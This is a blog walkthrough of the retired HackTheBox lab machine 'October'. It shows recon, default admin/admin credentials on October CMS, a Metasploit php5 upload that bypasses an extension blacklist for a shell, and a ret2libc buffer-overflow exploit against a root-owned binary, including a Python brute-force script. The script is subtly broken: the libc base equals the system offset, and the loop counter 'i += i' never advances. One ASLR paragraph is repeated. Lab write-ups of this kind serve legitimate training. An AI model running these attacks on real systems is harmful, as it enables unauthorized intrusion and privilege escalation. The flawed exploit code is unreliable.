Hackthebox.eu - Retired - October
Recon
As always I start with a simple UP/Down scan on all TCP ports to see what is live.
# nmap -T 4 -p- -oX /root/Desktop/HTB/October/nmapb.xml october.htb
Then I convert the output to HTML to make it pretty
xsltproc /root/Desktop/HTB/October/nmapb.xml -o /root/Desktop/HTB/October/nmapb.html
Not much open just 22 and 80
Let's scan those ports with -A to try to finger OS/Services
# nmap -T 4 -p22,80 -A -oX /root/Desktop/HTB/October/nmapf.xml october.htb
Then convert that to HTML too
Let's see what is on port 80
A quick google search around for october CMS we see a lot of authenticated attack vectors. Let's see if we can create an account.
Exploit
Just filling in some generic things, I set the password to "password" (BTW test@test.com said it was already taken)
Now it wants us to change the password
I changed the password to Password1. After doing this I don't think this step was necessary.
Ok let's poke around and see what access our new account might have given us.
Under the forums, I selected a channel and now I have the option to post a new topic..
I was able to create a test posting
Googling around I Found this site for exploits
Which exploits the backen login page for october. It give this following path as the default backend login page
/backend/backend/auth/signin
Let's see if that is where ours is?
We didn't get anywhere else with the exploit on that page because our victim requires login fields to be set.
But we did learn about this admin login page.
Let's see if we can break in
I tried modifying intercepted burp request in repeater to see if could get any more data
We did find some data leaks
If we send a user that doesn't exist we get back "auserwasnotfoundwiththegivencredentials"
But if we send one that does exist
We get a message "A user was found to match all plain text credentials however hashed credential "password" did not match"
So we can use this to suss out some valid login names to attack
I tried other combos of names mentioned on the site Alexey BobKov & Samuel Gorege, but couldn't get the site to verify they exist.
A little more digging and those are the creators of october itself nothing to do with this site apparently
Also while googling I found the default creds for October are admin/admin
Guess what?
We got it
Earlier I found a authenticated attack that has a metasploit module
This exploit uploads a php5 file to get shell, the October system uses a black list to prevent certain files from being executed
protected function blockedExtensions()
{
return [
'asp',
'avfp',
'aspx',
'cshtml',
'cfm',
'go',
'gsp',
'hs',
'jsp',
'ssjs',
'js',
'lasso',
'lp',
'op',
'lua',
'p',
'cgi',
'ipl',
'pl',
'php',
'php3',
'php4',
'phtml',
'py',
'rhtml',
'rb',
'rbw',
'smx',
'tcl',
'dna',
'tpl',
'r',
'w',
'wig'
];
}
As you can see in this list php5 is not listed and therefore is not blocked. So this exploit uses php5 to create a shell back to the attacker.
Let's load up metasploit and give it a whirl
# msfconsole
Use 5
Let's check the options
As you can see admin/admin are already set for the creds so we just need to give it the rhost ( the machine we are attacking october.htb)
And the lhost ( my vpn IP)
And we have our foothold!!
We are in running as www-data
Under /home we find
And we can already read user.txt in harry's directory
A little more about the box uuid
Let's move LinEnum.sh over to the box
I have the script save in my /Payloads folder
Here you can start SimpleHTTPServer, and you will see the download there
Then on the october.htb box I did
Then we had to give the file executable permissions
chmod +x ./LinEnum.sh
Then we can run it
./LinEnum.sh
Here we can see a file /usr/local/bin/ovrflw with root that we can execute.
Let's check it out ovrflw sounds like something that might be susceptible to a buffer overflow attack
I"m not great with buffer overflows yet so I'm leaning pretty hard one some examples I can find around
Being chief among them
First I want to load the program up in gdb
First I just give 9 digits to the program in gdb to see if it works
Now I'm going to use pattern_create.rb to generate some longer strings for me
# ruby /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
So here I have 100 characters I can now throw into gdb to see if we still work okay or get a buffer overflow
100 seemed to work fine, lets double it too 200
Ok we got a segmentation fault, so the buffer is less than 200 because our program crashed when we sent 200
Now we can grab the address of the fault 64413764 and put it into pattern_offset to find the eip
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 64413764
[*] Exact match at offset 112
Let's try sending 112 A's followd by 4 B's, to see if we can get the EIP to read 42424242 ( which is hex for B)
ruby -e "print 'A'*112 +'B'*4"
Which give us
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
This did exactly what we wanted to see, the EIP was overwritten with B's
So we absolutely know the buffer can hold 112 characters before it crashes and starts to overwrite the eip
Let's take a look at the assembly for the program
Disas main
Let's check the security of the file too ** I installed peda at this point too**
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
NX is enabled and RELRO is partial… wtf does that mean?
NX
"The NX bit (no-execute) is a technology used in CPUs to segregate areas of memory for use by either storage of processor instructions (code) or for storage of data"
Basically it sets parts of the parts of the memory to only allow storage and not execution.
RELRO
This makes dynamically linked libraries load when the program starts and makes the GOT read-only during execution. This keeps us from being able to overwrite the linked libraries in the GOT in full mode.
In partial mode like we have here, the GOT is still writable it just loads them before the BSS
https://en.wikipedia.org/wiki/.bss
This box also has aslr enabled which means the memory address will change every time the program executes, but since its only a 32-bit executable there are only 512 spots the data can be randomized to, so we will just use a script to loop through 512 times and hopefully one of those times it will be the same address space as the data we are pulling out of the system now
https://en.wikipedia.org/wiki/Address_space_layout_randomization
This box also has aslr enabled which means the memory address will change every time the program executes, but since its only a 32-bit executable there are only 512 spots the data can be randomized to, so we will just use a script to loop through 512 times and hopefully one of those times it will be the same address space as the data we are pulling out of the system now
https://en.wikipedia.org/wiki/Address_space_layout_randomization
This means we have a little extra work to do. Normally we could just send a bunch of nop sleds before our code and just point the eip to somewhere around where our nops sleds should be and it would just hit one and slide all the way down to our code.But with NX enabled we can't get code execution from the memory stack. We are going to have to find another route.
So we need to make our attack a return to libc attack
"A "return-to-libc" attack is a computer security attack usually starting with a buffer overflow in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process' executable memory, bypassing the no-execute bit feature (if present) and ridding the attacker of the need to inject their own code. The first example of this attack in the wild was contributed by Alexander Peslyak on the Bugtraq mailing list in 1997.[1]"
We will follow allowing with this blog to craft our overflow on October
let's get our info
Base Address
System Offset
Exit Offset
/bin/sh Offset
Base Address
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
/bin/sh
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
162bac /bin/sh
System
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
Exit
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
So we have
Base 0x00040310
System 0x00040310
Exit 0x00033260
/bin/sh 0x00162bac
Now just like in the blog we will make our little python script to create the overflow to pass to the program
from subprocess import call
import struct
base = 0x00040310
syst = 0x00040310
exit = 0x00033260
binsh =0x00162bac
syst_final = struct.pack("<I", base+syst)
exit_final = struct.pack("<I", base+exit)
binsh_final = struct.pack("<I", base+binsh)
buf = "A" * 112
buf += syst_final
buf +=exit_final
buf += binsh_final
i=0
while (i<512):
print "Try: %s" %i
print buf
i += i
ret = call(["/usr/local/bin/ovrflw", buf])
Copy that over to october box using wget
And give the file execute rights chmod +x ./October.py
Then run the script
Python ./October.py
I saw a bunch of this until it seemed like it just stopped
Then whoami showed me we had won
Got that root.txt
Comments
Post a Comment